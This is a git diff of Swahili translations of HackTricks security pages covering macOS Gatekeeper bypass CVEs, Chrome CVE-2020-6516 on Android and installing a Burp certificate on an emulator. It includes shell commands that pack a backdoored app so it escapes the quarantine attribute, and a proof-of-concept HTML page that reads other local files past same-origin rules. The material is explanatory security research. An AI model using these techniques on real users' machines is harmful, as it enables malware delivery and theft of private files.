XProtect ni kipengele kilichojengwa cha **kuzuia zisizo za programu hasidi** kwenye macOS. XProtect **huchunguza programu yoyote wakati inazinduliwa kwa mara ya kwanza au kuhaririwa dhidi ya database yake** ya programu hasidi inayojulikana na aina za faili hatari. Unapopakua faili kupitia programu fulani, kama Safari, Mail, au Messages, XProtect huchunguza faili hiyo kiotomatiki. Ikiwa inalingana na programu hasidi inayojulikana katika database yake, XProtect itazuia faili hiyo isizinduliwe na kukuarifu kuhusu tishio.
|
||||
|
||||
Database ya XProtect inasasishwa **kwa mara kwa mara** na Apple na ufafanuzi mpya wa programu hasidi, na visasisho hivi hupakuliwa na kusakinishwa kiotomatiki kwenye Mac yako. Hii inahakikisha kuwa XProtect iko daima na taarifa za hivi karibuni kuhusu vitisho vinavyojulikana.
|
||||
Database ya XProtect ina **sasishwa mara kwa mara** na Apple na ufafanuzi mpya wa programu hasidi, na sasisho hizi hupakuliwa na kusakinishwa kiotomatiki kwenye Mac yako. Hii inahakikisha kuwa XProtect iko daima na taarifa za hivi karibuni kuhusu vitisho vinavyojulikana.
|
||||
|
||||
Hata hivyo, ni muhimu kufahamu kuwa **XProtect si suluhisho kamili la antivirus**. Inachunguza tu orodha maalum ya vitisho vinavyojulikana na haitoi uchunguzi wa moja kwa moja kama programu nyingi za antivirus.
|
||||
|
||||
|
@ -310,36 +313,36 @@ Tafadhali kumbuka kuna App nyingine katika **`/Library/Apple/System/Library/Core
|
|||
### Sio Gatekeeper
|
||||
|
||||
{% hint style="danger" %}
|
||||
Tafadhali elewa kuwa Gatekeeper **haitoi kila wakati** unapotekeleza programu, _**AppleMobileFileIntegrity**_ (AMFI) ita **thibitisha saini za nambari za utekelezaji** wakati unapotekeleza programu ambayo tayari imekwisha tekelezwa na kuthibitishwa na Gatekeeper.
|
||||
Tafadhali elewa kuwa Gatekeeper **haitoi kila wakati** unapotekeleza programu, _**AppleMobileFileIntegrity**_ (AMFI) itathibitisha tu **sahihi za nambari za programu zinazoweza kutekelezwa** unapotekeleza programu ambayo tayari imetekelezwa na kuthibitishwa na Gatekeeper.
|
||||
{% endhint %}
|
||||
|
||||
Hivyo, hapo awali ilikuwa inawezekana kutekeleza programu ili kuicache na Gatekeeper, kisha **kurekebisha faili zisizo za utekelezaji za programu** (kama vile faili za Electron asar au NIB) na ikiwa hakukuwa na kinga nyingine mahali, programu ilitekelezwa na **maboresho ya uovu**.
|
||||
Hivyo basi, hapo awali ilikuwa inawezekana kutekeleza programu ili kuicache na Gatekeeper, kisha **kurekebisha faili zisizoweza kutekelezwa za programu** (kama vile faili za Electron asar au NIB) na ikiwa hakukuwa na kinga nyingine mahali, programu ilitekelezwa na **viongezeo vya madhara**.
|
||||
|
||||
Hata hivyo, sasa hii siwezekani kwa sababu macOS **inazuia kurekebisha faili** ndani ya vifurushi vya programu. Kwa hivyo, ikiwa utajaribu shambulio la [Dirty NIB](../macos-proces-abuse/macos-dirty-nib.md), utagundua kuwa sasa haiwezekani kuitumia kwa sababu baada ya kutekeleza programu ili kuicache na Gatekeeper, hautaweza kurekebisha mfuko. Na ikiwa utabadilisha jina la saraka ya Contents kuwa NotCon (kama ilivyoelezwa katika shambulio), kisha utekeleze faili kuu ya programu ili kuicache na Gatekeeper, itasababisha kosa na haitatekelezwa.
|
||||
Hata hivyo, sasa hili siwezekani kwa sababu macOS **inazuia kurekebisha faili** ndani ya vifurushi vya programu. Kwa hivyo, ikiwa utajaribu shambulio la [Dirty NIB](../macos-proces-abuse/macos-dirty-nib.md), utagundua kuwa sasa si rahisi tena kulitumia kwa sababu baada ya kutekeleza programu ili kuicache na Gatekeeper, hautaweza kurekebisha mfuko huo. Na ikiwa utabadilisha jina la saraka ya Contents kuwa NotCon (kama ilivyoelezwa katika shambulio), kisha utekeleze faili kuu ya programu ili kuicache na Gatekeeper, itasababisha kosa na haitatekelezwa.
|
||||
|
||||
## Kupita Mipangilio ya Gatekeeper
|
||||
## Kupita Mipaka ya Gatekeeper
|
||||
|
||||
Njia yoyote ya kupita mipangilio ya Gatekeeper (kufanikiwa kufanya mtumiaji kupakua kitu na kuitekeleza wakati Gatekeeper inapaswa kuzuia) inachukuliwa kuwa udhaifu katika macOS. Hizi ni baadhi ya CVE zilizotengwa kwa mbinu zilizoruhusu kupita mipangilio ya Gatekeeper hapo awali:
|
||||
Njia yoyote ya kudanganya Gatekeeper (kufanikiwa kufanya mtumiaji kupakua kitu na kutekeleza wakati Gatekeeper inapaswa kuzuia) inachukuliwa kama udhaifu katika macOS. Hizi ni baadhi ya CVE zilizotengwa kwa mbinu zilizoruhusu kudanganya Gatekeeper hapo awali:
|
||||
|
||||
### [CVE-2021-1810](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810)
|
||||
|
||||
Ilionekana kwamba ikiwa **Archive Utility** inatumika kwa kuchambua, faili zenye **njia zinazozidi wahusika 886** hazipati sifa ya ziada ya com.apple.quarantine. Hali hii kwa bahati mbaya inaruhusu faili hizo kupita kwenye ukaguzi wa usalama wa **Gatekeeper**.
|
||||
Ilionekana kwamba ikiwa **Archive Utility** inatumika kwa kuchambua, faili zenye **njia zinazozidi wahusika 886** hazipati sifa ya ziada ya com.apple.quarantine. Hali hii kwa bahati mbaya inaruhusu faili hizo kuzunguka **udhibiti wa usalama wa Gatekeeper**.
|
||||
|
||||
Angalia [**ripoti ya awali**](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810) kwa maelezo zaidi.
|
||||
Angalia [**ripoti ya asili**](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810) kwa maelezo zaidi.
|
||||
|
||||
### [CVE-2021-30990](https://ronmasas.com/posts/bypass-macos-gatekeeper)
|
||||
|
||||
Wakati programu inaundwa na **Automator**, habari kuhusu kinachohitajika kutekelezwa iko ndani ya `application.app/Contents/document.wflow` si kwenye utekelezaji. Utekelezaji ni tu utekelezaji wa jumla wa Automator unaoitwa **Automator Application Stub**.
|
||||
Wakati programu inaundwa na **Automator**, habari kuhusu kinachohitajika kutekelezwa iko ndani ya `application.app/Contents/document.wflow` si kwenye faili ya kutekelezwa. Faili ya kutekelezwa ni tu programu-jalizi ya kawaida ya Automator inayoitwa **Automator Application Stub**.
|
||||
|
||||
Kwa hivyo, unaweza kufanya `application.app/Contents/MacOS/Automator\ Application\ Stub` **kuashiria kwa kiungo ishara kwa Automator Application Stub nyingine ndani ya mfumo** na itatekeleza kilicho ndani ya `document.wflow` (maandishi yako) **bila kuzindua Gatekeeper** kwa sababu utekelezaji halisi haujapata sifa ya karantini.
|
||||
Kwa hivyo, unaweza kufanya `application.app/Contents/MacOS/Automator\ Application\ Stub` **kuashiria kwa kiungo cha ishara kwa Automator Application Stub nyingine ndani ya mfumo** na itatekeleza kilicho ndani ya `document.wflow` (maandishi yako) **bila kuzindua Gatekeeper** kwa sababu faili ya kutekelezwa halina sifa ya karantini.
|
||||
|
||||
Mfano wa eneo linalotarajiwa: `/System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub`
|
||||
|
||||
Angalia [**ripoti ya awali**](https://ronmasas.com/posts/bypass-macos-gatekeeper) kwa maelezo zaidi.
|
||||
Angalia [**ripoti ya asili**](https://ronmasas.com/posts/bypass-macos-gatekeeper) kwa maelezo zaidi.
|
||||
|
||||
### [CVE-2022-22616](https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/)
|
||||
|
||||
Katika kipita hiki, faili ya zip iliumbwa na programu ikaanza kufanya kazi kutoka `application.app/Contents` badala ya `application.app`. Kwa hivyo, **sifa ya karantini** ilitekelezwa kwa **faili zote kutoka `application.app/Contents`** lakini **sio kwa `application.app`**, ambayo ndiyo Gatekeeper ilikuwa inakagua, hivyo Gatekeeper ilipitishwa kwa sababu wakati `application.app` ilipotumiwa haikuwa na sifa ya karantini.
|
||||
Katika kudanganya hii, faili ya zip iliumbwa na programu ilianza kubana kutoka `application.app/Contents` badala ya `application.app`. Kwa hivyo, **sifa ya karantini** ilitekelezwa kwa **faili zote kutoka `application.app/Contents`** lakini **sio kwa `application.app`**, ambayo ndiyo Gatekeeper ilikuwa inachunguza, hivyo Gatekeeper ilipuuzwa kwa sababu wakati `application.app` ilipotumiwa haikuwa na sifa ya karantini.
|
||||
```bash
|
||||
zip -r test.app/Contents test.zip
|
||||
```
|
||||
|
@ -364,7 +367,7 @@ xattr: [Errno 13] Permission denied: '/tmp/no-attr'
|
|||
```
|
||||
Zaidi ya hayo, muundo wa faili wa **AppleDouble** unaiga faili pamoja na ACEs zake.
|
||||
|
||||
Katika [**michochezi ya chanzo**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) ni inawezekana kuona kuwa uwakilishi wa maandishi wa ACL uliohifadhiwa ndani ya xattr inayoitwa **`com.apple.acl.text`** itawekwa kama ACL katika faili iliyopunguzwa. Kwa hivyo, ikiwa ulipunguza programu ndani ya faili ya zip na muundo wa faili wa **AppleDouble** na ACL ambayo inazuia xattrs nyingine kuandikwa kwake... xattr ya karantini haikuwekwa kwenye programu:
|
||||
Katika [**msimbo wa chanzo**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) inawezekana kuona kuwa uwakilishi wa maandishi wa ACL uliohifadhiwa ndani ya xattr inayoitwa **`com.apple.acl.text`** utawekwa kama ACL katika faili iliyofunguliwa. Kwa hivyo, ikiwa ulifunga programu ndani ya faili ya zip na muundo wa faili wa **AppleDouble** na ACL ambayo inazuia xattrs zingine kuandikwa kwake... xattr ya karantini haikuwekwa kwenye programu:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
@ -377,7 +380,7 @@ python3 -m http.server
|
|||
|
||||
Angalia [**ripoti ya asili**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/) kwa maelezo zaidi.
|
||||
|
||||
Tafadhali elewa kwamba hii inaweza pia kutumika na AppleArchives:
|
||||
Tafadhali elewa kwamba hii pia inaweza kutumika na AppleArchives:
|
||||
```bash
|
||||
mkdir app
|
||||
touch app/test
|
||||
|
@ -386,11 +389,11 @@ aa archive -d app -o test.aar
|
|||
```
|
||||
### [CVE-2023-27943](https://blog.f-secure.com/discovery-of-gatekeeper-bypass-cve-2023-27943/)
|
||||
|
||||
Iligunduliwa kwamba **Google Chrome haikuweka sifa ya karantini** kwa faili zilizopakuliwa kutokana na matatizo fulani ya ndani ya macOS.
|
||||
Iligunduliwa kwamba **Google Chrome haikuweka sifa ya karantini** kwa faili zilizopakuliwa kwa sababu ya matatizo fulani ya ndani ya macOS.
|
||||
|
||||
### [CVE-2023-27951](https://redcanary.com/blog/gatekeeper-bypass-vulnerabilities/)
|
||||
|
||||
Muundo wa faili za AppleDouble hifadhi sifa za faili katika faili tofauti inayoanza na `._`, hii husaidia kunakili sifa za faili **kati ya mashine za macOS**. Hata hivyo, iligundulika kwamba baada ya kufuta faili ya AppleDouble, faili inayoanza na `._` **haikuwekewa sifa ya karantini**.
|
||||
Muundo wa faili za AppleDouble hifadhi sifa za faili katika faili tofauti inayoanza na `._`, hii husaidia kunakili sifa za faili **kati ya mashine za macOS**. Walakini, iligundulika kwamba baada ya kufuta faili ya AppleDouble, faili inayoanza na `._` **haikuwekewa sifa ya karantini**.
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
@ -404,8 +407,8 @@ aa archive -d test/ -o test.aar
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
Kwa kuweza kuunda faili ambayo haitakuwa na sifa ya karantini ilikuwa **inawezekana kukiuka Gatekeeper.** Hila ilikuwa **kuunda programu ya faili ya DMG** kutumia mbinu ya jina la AppleDouble (anza na `._`) na kuunda **faili inayoonekana kama kiungo cha ishara kwa faili hii iliyofichwa** bila sifa ya karantini.\
|
||||
Wakati **faili ya dmg inapotekelezwa**, kwa kuwa haina sifa ya karantini ita**pita Gatekeeper**.
|
||||
Kwa kuweza kuunda faili ambayo haitakuwa na sifa ya karantini ilikuwa **inawezekana kudukua Gatekeeper.** Hila ilikuwa **kuunda faili ya programu ya DMG** kutumia mkataba wa jina la AppleDouble (anza na `._`) na kuunda **faili inayoonekana kama kiungo cha ishara kwa faili hii iliyofichwa** bila sifa ya karantini.\
|
||||
Wakati **faili ya dmg inapotekelezwa**, kwa kuwa haina sifa ya karantini ita**dokoa Gatekeeper**.
|
||||
```bash
|
||||
# Create an app bundle with the backdoor an call it app.app
|
||||
|
||||
|
@ -421,6 +424,10 @@ ln -s ._app.dmg s/app/app.dmg
|
|||
echo "[+] compressing files"
|
||||
aa archive -d s/ -o app.aar
|
||||
```
|
||||
### Zuia Quarantine xattr
|
||||
### Zuia Karantini xattr
|
||||
|
||||
Katika mfuko wa ".app" ikiwa quarantine xattr haijaongezwa, wakati inatekelezwa **Gatekeeper haitaanzishwa**.
|
||||
Katika kifurushi cha ".app" ikiwa xattr ya karantini haijaongezwa, wakati wa kuitekeleza **Gatekeeper haitaanzishwa**.
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
|
|
@ -4,32 +4,33 @@
|
|||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
**Hii ni muhtasari wa chapisho [https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)**
|
||||
|
||||
### Orodha ya Faili katika Media Store
|
||||
Ili kuorodhesha faili zinazosimamiwa na Media Store, unaweza kutumia amri ifuatayo:
|
||||
### Orodha ya Faili katika Hifadhi ya Media
|
||||
Ili kuorodhesha faili zinazosimamiwa na Hifadhi ya Media, unaweza kutumia amri ifuatayo:
|
||||
```bash
|
||||
$ content query --uri content://media/external/file
|
||||
```
|
||||
Kwa matokeo rahisi kueleweka zaidi, onyesha tu kitambulisho na njia ya kila faili iliyohifadhiwa:
|
||||
Kwa matokeo yanayoeleweka zaidi na ya kirafiki kwa binadamu, onyesha tu kitambulisho na njia ya kila faili iliyohifadhiwa:
|
||||
```bash
|
||||
$ content query --uri content://media/external/file --projection _id,_data
|
||||
```
|
||||
Watoaji wa yaliyomo wamejikita katika eneo lao binafsi. Upatikanaji wa watoaji unahitaji `content://` URI maalum. Taarifa kuhusu njia za kupata watoaji zinaweza kupatikana kutoka kwa maandishi ya maombi au msimbo wa chanzo wa Android.
|
||||
### Upatikanaji wa Chrome kwa Watoa Huduma za Yaliyomo
|
||||
Chrome kwenye Android inaweza kupata watoa huduma za yaliyomo kupitia mpango wa `content://`, kuruhusu kupata rasilimali kama picha au hati zilizotolewa na programu za watu wa tatu. Ili kufafanua hili, faili inaweza kuingizwa kwenye Hifadhi ya Vyombo vya Habari na kisha kupatikana kupitia Chrome:
|
||||
|
||||
### Upatikanaji wa Chrome kwa Watoaji wa Yaliyomo
|
||||
Chrome kwenye Android inaweza kupata watoaji wa yaliyomo kupitia mpango wa `content://`, ikiruhusu kupata rasilimali kama picha au hati zilizosafirishwa na programu za tatu. Ili kuonyesha hili, faili inaweza kuingizwa kwenye Duka la Vyombo vya Habari na kisha kupatikana kupitia Chrome:
|
||||
|
||||
Ingiza kuingia desturi kwenye Duka la Vyombo vya Habari:
|
||||
Ingiza kuingizwa maalum kwenye Hifadhi ya Vyombo vya Habari:
|
||||
```bash
|
||||
cd /sdcard
|
||||
echo "Hello, world!" > test.txt
|
||||
|
@ -37,27 +38,27 @@ content insert --uri content://media/external/file \
|
|||
--bind _data:s:/storage/emulated/0/test.txt \
|
||||
--bind mime_type:s:text/plain
|
||||
```
|
||||
Gundua kitambulisho cha faili iliyoingizwa hivi karibuni:
|
||||
Gundua kitambulisho cha faili iliyowekwa hivi karibuni:
|
||||
```bash
|
||||
content query --uri content://media/external/file \
|
||||
--projection _id,_data | grep test.txt
|
||||
# Output: Row: 283 _id=747, _data=/storage/emulated/0/test.txt
|
||||
```
|
||||
Faili hilo linaweza kuonekana kwenye Chrome kwa kutumia URL iliyojengwa na kitambulisho cha faili.
|
||||
Faili hiyo inaweza kisha kuonekana kwenye Chrome kwa kutumia URL iliyojengwa na kitambulisho cha faili.
|
||||
|
||||
Kwa mfano, kuorodhesha faili zinazohusiana na programu maalum:
|
||||
```bash
|
||||
content query --uri content://media/external/file --projection _id,_data | grep -i <app_name>
|
||||
```
|
||||
### Chrome CVE-2020-6516: Kuvuka Sera ya Asili Iliyofanana
|
||||
### Chrome CVE-2020-6516: Kizuizi la Sera ya Asili Sawa
|
||||
|
||||
_Sera ya Asili Iliyofanana_ (SOP) ni itifaki ya usalama katika vivinjari ambayo inazuia kurasa za wavuti kuingiliana na rasilimali kutoka asili tofauti isipokuwa ikiwa imeidhinishwa wazi na sera ya _Cross-Origin-Resource-Sharing_ (CORS). Sera hii inalenga kuzuia uvujaji wa habari na udanganyifu wa ombi la tovuti nyingine. Chrome inachukulia `content://` kama mpango wa ndani, ikimaanisha kuwa kuna sheria kali za SOP, ambapo kila URL ya mpango wa ndani inachukuliwa kama asili tofauti.
|
||||
_Sera ya Asili Sawa_ (SOP) ni itifaki ya usalama katika vivinjari ambayo inazuia kurasa za wavuti kuingiliana na rasilimali kutoka asili tofauti isipokuwa imeidhinishwa wazi na sera ya Kuvuka-Mwanzo-Mzazi (CORS). Sera hii inalenga kuzuia uvujaji wa habari na udanganyifu wa ombi la wavuti. Chrome inachukulia `content://` kama mpango wa ndani, ikimaanisha sheria kali za SOP, ambapo kila URL ya mpango wa ndani inachukuliwa kama asili tofauti.
|
||||
|
||||
Hata hivyo, CVE-2020-6516 ilikuwa ni udhaifu katika Chrome ambao uliruhusu kuvuka sheria za SOP kwa rasilimali zilizopakia kupitia URL ya `content://`. Kimsingi, msimbo wa JavaScript kutoka URL ya `content://` ulikuwa na uwezo wa kufikia rasilimali nyingine zilizopakia kupitia URL za `content://`, ambayo ilikuwa ni wasiwasi mkubwa wa usalama, hasa kwenye vifaa vya Android vinavyotumia toleo la chini ya Android 10, ambapo uhifadhi uliopangwa haukuwa umetekelezwa.
|
||||
Hata hivyo, CVE-2020-6516 ilikuwa udhaifu katika Chrome ulioruhusu kukiuka sheria za SOP kwa rasilimali zilizopakiwa kupitia URL ya `content://`. Kwa athari, msimbo wa JavaScript kutoka URL ya `content://` ulikuwa na uwezo wa kupata rasilimali zingine zilizopakiwa kupitia URL za `content://`, ambayo ilikuwa wasiwasi mkubwa wa usalama, hasa kwenye vifaa vya Android vinavyotumia toleo kabla ya Android 10, ambapo uhifadhi uliolengwa haukuwa umetekelezwa.
|
||||
|
||||
Uthibitisho wa dhana hii unadhihirisha udhaifu huu, ambapo hati ya HTML, baada ya kupakiwa chini ya **/sdcard** na kuongezwa kwenye Duka la Vyombo vya Habari, hutumia `XMLHttpRequest` katika JavaScript yake ili kupata na kuonyesha maudhui ya faili nyingine kwenye Duka la Vyombo vya Habari, kwa kuvuka sheria za SOP.
|
||||
Uthibitisho wa dhana hapo chini unaonyesha udhaifu huu, ambapo hati ya HTML, baada ya kupakiwa chini ya **/sdcard** na kuongezwa kwenye Hifadhi ya Vyombo vya Habari, inatumia `XMLHttpRequest` katika JavaScript yake kupata na kuonyesha maudhui ya faili nyingine kwenye Hifadhi ya Vyombo vya Habari, kukiuka sheria za SOP.
|
||||
|
||||
Uthibitisho wa Dhana ya HTML:
|
||||
Uthibitisho wa Dhana wa HTML:
|
||||
```xml
|
||||
<html>
|
||||
<head>
|
||||
|
@ -86,16 +87,20 @@ xhr.send();
|
|||
<body onload="poc()"></body>
|
||||
</html>
|
||||
```
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,26 +2,31 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## Kwenye Mashine ya Virtual
|
||||
|
||||
Kwanza kabisa unahitaji kupakua cheti cha Der kutoka Burp. Unaweza kufanya hivi katika _**Proxy**_ --> _**Chaguo**_ --> _**Ingiza/Toa cheti cha CA**_
|
||||
Kwanza kabisa unahitaji kupakua cheti cha Der kutoka Burp. Unaweza kufanya hivi katika _**Proxy**_ --> _**Chaguo**_ --> _**Import / Export CA certificate**_
|
||||
|
||||
![](<../../.gitbook/assets/image (367).png>)
|
||||
|
||||
**Toa cheti kwa muundo wa Der** na **litubadilishe** kuwa muundo ambao **Android** itaweza **kuelewa.** Kumbuka kwamba **ili kusanidi cheti cha burp kwenye mashine ya Android kwenye AVD** unahitaji **kuendesha** mashine hii **na** chaguo la **`-writable-system`**.\
|
||||
Kwa mfano unaweza kuendesha kama:
|
||||
**Eksporti cheti kwa muundo wa Der** na acha **litafsiriwe** kwa muundo ambao **Android** itaweza **kuelewa.** Kumbuka kwamba **ili kusanidi cheti cha burp kwenye mashine ya Android kwenye AVD** unahitaji **kuendesha** mashine hii **na** chaguo la **`-writable-system`**.\
|
||||
Kwa mfano unaweza kuendesha kama hivi:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
@ -52,19 +57,19 @@ Ikiwa umefanya **root kifaa chako na Magisc** (labda emulator), na huwezi kufuat
|
|||
|
||||
Iliyoelezwa katika [**video hii**](https://www.youtube.com/watch?v=qQicUW0svB8) unahitaji:
|
||||
|
||||
1. **Sakinisha cheti cha CA**: Tu **vuta na achia** cheti cha DER cha Burp **ukiibadilisha kielezo** kuwa `.crt` kwenye simu ili iwekwe kwenye folda ya Upakuaji na nenda kwa `Sakinisha cheti` -> `Cheti cha CA`
|
||||
1. **Kusakinisha cheti cha CA**: Tu **vuta na achia** cheti cha DER cha Burp **ukibadilisha kificho** kuwa `.crt` kwenye simu ili iwekwe kwenye folda ya Upakuaji na nenda kwenye `Sakinisha cheti` -> `Cheti cha CA`
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (50).png" alt="" width="164"><figcaption></figcaption></figure>
|
||||
|
||||
* Hakikisha cheti kimehifadhiwa kwa usahihi kwa kwenda kwa `Imaniwa` -> `MTUMIAJI`
|
||||
* Hakikisha cheti kimehifadhiwa kwa usahihi kwa kwenda kwa `Imani credentials` -> `MTUMIAJI`
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (51).png" alt="" width="334"><figcaption></figcaption></figure>
|
||||
|
||||
2. **Fanya iwe ya kuaminika kwa System**: Pakua moduli ya Magisc [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (faili ya .zip), **vuta na acha** kwenye simu, nenda kwa programu ya **Magics** kwenye simu kwenye sehemu ya **`Moduli`**, bonyeza **`Sakinisha kutoka kwa uhifadhi`**, chagua moduli ya `.zip` na baada ya kusakinishwa **anzisha upya** simu:
|
||||
2. **Fanya iwe ya kuaminika kwa System**: Pakua moduli ya Magisc [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (faili ya .zip), **vuta na acha** kwenye simu, nenda kwenye programu ya **Magics** kwenye simu kwenye sehemu ya **`Moduli`**, bonyeza **`Sakinisha kutoka kwenye hifadhi`**, chagua moduli ya `.zip` na baada ya kusakinisha **anzisha upya** simu:
